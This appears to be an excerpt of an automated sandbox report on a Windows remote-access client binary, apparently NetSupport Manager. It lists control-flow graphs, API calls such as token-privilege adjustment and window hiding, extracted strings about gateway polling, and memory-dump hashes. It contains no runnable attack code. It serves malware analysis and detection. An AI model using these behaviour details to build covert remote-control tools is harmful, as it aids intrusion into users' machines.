                                                                                        • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                        • API String ID: 692187944-2561115898
                                                                                        • Opcode ID: 574b3296dc474fdc72ae11ba8bce62f71b67a1ab546bdb78f41d81afee3bc80c
                                                                                        • Instruction ID: 44f94ec1c88d7db5491e80e620df174b7a2fc33a1a47120a4199ddf8edfa3f0f
                                                                                        • Opcode Fuzzy Hash: 574b3296dc474fdc72ae11ba8bce62f71b67a1ab546bdb78f41d81afee3bc80c
                                                                                        • Instruction Fuzzy Hash: 86E17271A042199FDB14DF94DC44FEEB3B5EF59304F0141AAEA0DA7284DBB49D84CBA2

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2072 11139090-111390c5 2073 111390d2-111390d9 2072->2073 2074 111390c7-111390cd GetCurrentThreadId 2072->2074 2075 111390e0-111390fc call 11133920 call 11133400 2073->2075 2076 111390db call 11029330 2073->2076 2074->2073 2082 11139102-11139108 2075->2082 2083 111391db-111391e2 2075->2083 2076->2075 2084 1113975a-11139775 call 11161d01 2082->2084 2085 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 2082->2085 2086 1113929a-111392b0 2083->2086 2087 111391e8-111391ef 2083->2087 2118 111391d1 2085->2118 2119 11139171-11139177 2085->2119 2096 111392b6-111392bd 2086->2096 2097 111393ef 2086->2097 2087->2086 2088 111391f5-111391fc 2087->2088 2088->2086 2091 11139202-11139211 FindWindowA 2088->2091 2091->2086 2095 11139217-1113921c IsWindowVisible 2091->2095 2095->2086 2099 1113921e-11139225 2095->2099 2100 111392bf-111392c9 2096->2100 2101 111392ce-111392ee call 1105dd10 2096->2101 2102 111393f1-11139402 2097->2102 2103 11139435-11139440 2097->2103 2099->2086 2105 11139227-1113924c call 11138c30 IsWindowVisible 2099->2105 2100->2103 2101->2103 2124 111392f4-11139323 2101->2124 2107 11139404-11139414 2102->2107 2108 1113941a-1113942f 2102->2108 2109 11139442-11139462 call 1105dd10 2103->2109 2110 11139476-1113947c 2103->2110 2105->2086 2129 1113924e-1113925d IsIconic 2105->2129 2107->2108 2108->2103 2132 11139470 2109->2132 2133 11139464-1113946e call 1102cff0 2109->2133 2113 1113947e-1113948a call 11138c30 2110->2113 2114 1113948d-11139495 2110->2114 2113->2114 2122 111394a7 2114->2122 2123 11139497-111394a2 call 1106b860 2114->2123 2118->2083 2119->2118 2127 11139179-11139190 call 11146450 GetForegroundWindow 2119->2127 2131 111394a7 call 1112ce90 2122->2131 2123->2122 2142 11139325-11139339 call 11081a70 2124->2142 2143 1113933e-11139351 call 11143230 2124->2143 2149 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 2127->2149 2150 111391be-111391c0 2127->2150 2129->2086 2135 1113925f-1113927a GetForegroundWindow call 11131210 * 2 2129->2135 2137 111394ac-111394b2 2131->2137 2132->2110 2133->2110 2180 1113928b-11139294 EnableWindow 2135->2180 2181 1113927c-11139282 2135->2181 2144 111394b4-111394ba call 11131b00 2137->2144 2145 111394bd-111394c6 2137->2145 2142->2143 2171 1113933b 2142->2171 2163 11139353-11139364 GetLastError call 11146450 2143->2163 2164 1113936e-11139375 2143->2164 2144->2145 2147 111394d4 call 111317a0 2145->2147 2148 111394c8-111394cb 2145->2148 2155 111394d9-111394df 2147->2155 2148->2155 2156 111394cd-111394d2 call 11131870 2148->2156 2149->2150 2150->2118 2159 111391c2-111391c8 2150->2159 2166 111394e5-111394eb 2155->2166 2167 111395e9-111395f4 call 111386b0 2155->2167 2156->2155 2159->2118 2169 111391ca-111391cb SetForegroundWindow 2159->2169 2163->2164 2174 11139377-11139392 2164->2174 2175 111393e8 2164->2175 2176 111394f1-111394f9 2166->2176 2177 1113959b-111395a3 2166->2177 2191 111395f6-11139608 call 110637c0 2167->2191 2192 11139615-1113961b 2167->2192 2169->2118 2171->2143 2189 11139395-111393a1 2174->2189 2175->2097 2176->2167 2184 111394ff-11139505 2176->2184 2177->2167 2182 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 2177->2182 2180->2086 2181->2180 2187 11139284-11139285 SetForegroundWindow 2181->2187 2182->2167 2184->2167 2190 1113950b-11139522 call 1110f420 2184->2190 2187->2180 2196 111393a3-111393b7 call 11081a70 2189->2196 2197 111393bc-111393c9 call 11143230 2189->2197 2210 11139544 2190->2210 2211 11139524-11139542 call 110573b0 2190->2211 2191->2192 2206 1113960a-11139610 call 11142210 2191->2206 2194 11139621-11139628 2192->2194 2195 1113974a-11139752 2192->2195 2194->2195 2202 1113962e-11139647 call 1105dd10 2194->2202 2195->2084 2196->2197 2218 111393b9 2196->2218 2197->2175 2213 111393cb-111393e6 GetLastError call 11146450 2197->2213 2202->2195 2223 1113964d-11139660 2202->2223 2206->2192 2214 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 2210->2214 2211->2214 2213->2103 2214->2167 2252 11139594-11139599 call 110ebf30 2214->2252 2218->2197 2233 11139662-11139668 2223->2233 2234 1113968d-11139693 2223->2234 2235 11139699-111396a5 GetTickCount 2233->2235 2238 1113966a-11139688 call 11146450 GetTickCount 2233->2238 2234->2195 2234->2235 2235->2195 2239 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 2235->2239 2238->2195 2258 111396f0-111396f5 2239->2258 2252->2167 2258->2258 2259 111396f7-111396fd 2258->2259 2260 11139700-11139705 2259->2260 2260->2260 2261 11139707-11139731 call 1112c7a0 2260->2261 2264 11139733-11139734 FreeLibrary 2261->2264 2265 1113973a-11139747 call 111618c1 2261->2265 2264->2265 2265->2195
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                        • IsWindow.USER32(0003042E), ref: 11139125
                                                                                        • IsWindowVisible.USER32(0003042E), ref: 11139133
                                                                                        • IsWindowVisible.USER32(0003042E), ref: 1113916B
                                                                                        • GetForegroundWindow.USER32 ref: 11139186
                                                                                        • EnableWindow.USER32(0003042E,00000000), ref: 111391A0
                                                                                        • EnableWindow.USER32(0003042E,00000001), ref: 111391BC
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                        • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                        • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                        • IsWindowVisible.USER32(0003042E), ref: 11139248
                                                                                        • IsIconic.USER32(0003042E), ref: 11139255
                                                                                        • GetForegroundWindow.USER32 ref: 1113925F
                                                                                          • Part of subcall function 11131210: ShowWindow.USER32(0003042E,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                          • Part of subcall function 11131210: ShowWindow.USER32(0003042E,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                        • EnableWindow.USER32(0003042E,00000001), ref: 11139294
                                                                                        • GetLastError.KERNEL32 ref: 11139353
                                                                                        • GetLastError.KERNEL32 ref: 111393CB
                                                                                        • GetTickCount.KERNEL32 ref: 11139678
                                                                                        • GetTickCount.KERNEL32 ref: 11139699
                                                                                          • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                        • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                        • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                        • API String ID: 2511061093-2542869446
                                                                                        • Opcode ID: 7ac7e7f547aa6a59f7753ff14195bb005c240a68c1cf99adf6e6792122ae882d
                                                                                        • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                        • Opcode Fuzzy Hash: 7ac7e7f547aa6a59f7753ff14195bb005c240a68c1cf99adf6e6792122ae882d
                                                                                        • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                        APIs
                                                                                        • #16.WSOCK32(00000000,009686C7,6D1D3361,00000000,00000000,6D1D3361,00000007), ref: 6D1C924C
                                                                                        • WSAGetLastError.WSOCK32(00000000,009686C7,6D1D3361,00000000,00000000,6D1D3361,00000007), ref: 6D1C925B
                                                                                        • GetTickCount.KERNEL32 ref: 6D1C9274
                                                                                        • Sleep.KERNEL32(00000001,00000000,009686C7,6D1D3361,00000000,00000000,6D1D3361,00000007), ref: 6D1C92A8
                                                                                        • GetTickCount.KERNEL32 ref: 6D1C92B0
                                                                                        • Sleep.KERNEL32(00000014), ref: 6D1C92BC
                                                                                        Strings
                                                                                        • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6D1C922B
                                                                                        • ReadSocket - Connection has been closed by peer, xrefs: 6D1C92E0
                                                                                        • *RecvTimeout, xrefs: 6D1C927B
                                                                                        • ReadSocket - Would block, xrefs: 6D1C928A
                                                                                        • ReadSocket - Error %d reading response, xrefs: 6D1C92F7
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6D1C9226
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountSleepTick$ErrorLast
                                                                                        • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                        • API String ID: 2495545493-2497412063
                                                                                        • Opcode ID: 865a8e7569a0ed591956d47bcb3e56d2912ca6b137442c0fcb8be585e6646117
                                                                                        • Instruction ID: 0959d6c378cab23f2cc04149daa4c79bc6d7105c58f2eee525f9cf659f62cf74
                                                                                        • Opcode Fuzzy Hash: 865a8e7569a0ed591956d47bcb3e56d2912ca6b137442c0fcb8be585e6646117
                                                                                        • Instruction Fuzzy Hash: 8F314735E4420CAFEB00DFF8D884BAEB3F4EF55319F004469EA48C7144D3B899408792
                                                                                        APIs
                                                                                        • GetSystemTime.KERNEL32(?,?,?,92DF354D,7AB33BE4,92DF34B3,FFFFFFFF,00000000), ref: 6D1D31E2
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6D1FECB0), ref: 6D1D31EC
                                                                                        • GetSystemTime.KERNEL32(?,7AB33BE4,92DF34B3,FFFFFFFF,00000000), ref: 6D1D322A
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6D1FECB0), ref: 6D1D3234
                                                                                        • EnterCriticalSection.KERNEL32(6D20B898,?,92DF354D), ref: 6D1D32BE
                                                                                        • LeaveCriticalSection.KERNEL32(6D20B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6D1D32D3
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6D1D334D
                                                                                          • Part of subcall function 6D1DBA20: __strdup.LIBCMT ref: 6D1DBA3A
                                                                                          • Part of subcall function 6D1DBB00: _free.LIBCMT ref: 6D1DBB2D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                        • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                        • API String ID: 1510130979-3441452530
                                                                                        • Opcode ID: 7465fe59967d98ec4192bea221a5b9cf4fffd6548de54eb99bf35b288238dae1
                                                                                        • Instruction ID: ab1ae0032ef080e9b6cab1e414110c027bc3f012a10d67cc6bf569dfa7c6fd37
                                                                                        • Opcode Fuzzy Hash: 7465fe59967d98ec4192bea221a5b9cf4fffd6548de54eb99bf35b288238dae1
                                                                                        • Instruction Fuzzy Hash: 1C6183B2D04209AFCB54DFA4D984FEEB7B5FF49304F05851EE516A3244DBB4A504CBA1
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                        • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                        • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                        • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                        • String ID: SHELL32.DLL$SHGetSettings
                                                                                        • API String ID: 4195908086-2348320231
                                                                                        • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                        • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                        • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                        • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: NBCTL32.DLL$_License$serial_no
                                                                                        • API String ID: 2102423945-35127696
                                                                                        • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                        • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                        • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                        • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID: Client32$NSMWClass$NSMWClass
                                                                                        • API String ID: 3192549508-611217420
                                                                                        • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                        • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                        • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                        • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,461C6054,00080000,00000000,00000000), ref: 1109D46D
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                        • String ID:
                                                                                        • API String ID: 2349140579-0
                                                                                        • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                        • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                        • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                        • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                        • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                        • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                        • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                        • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
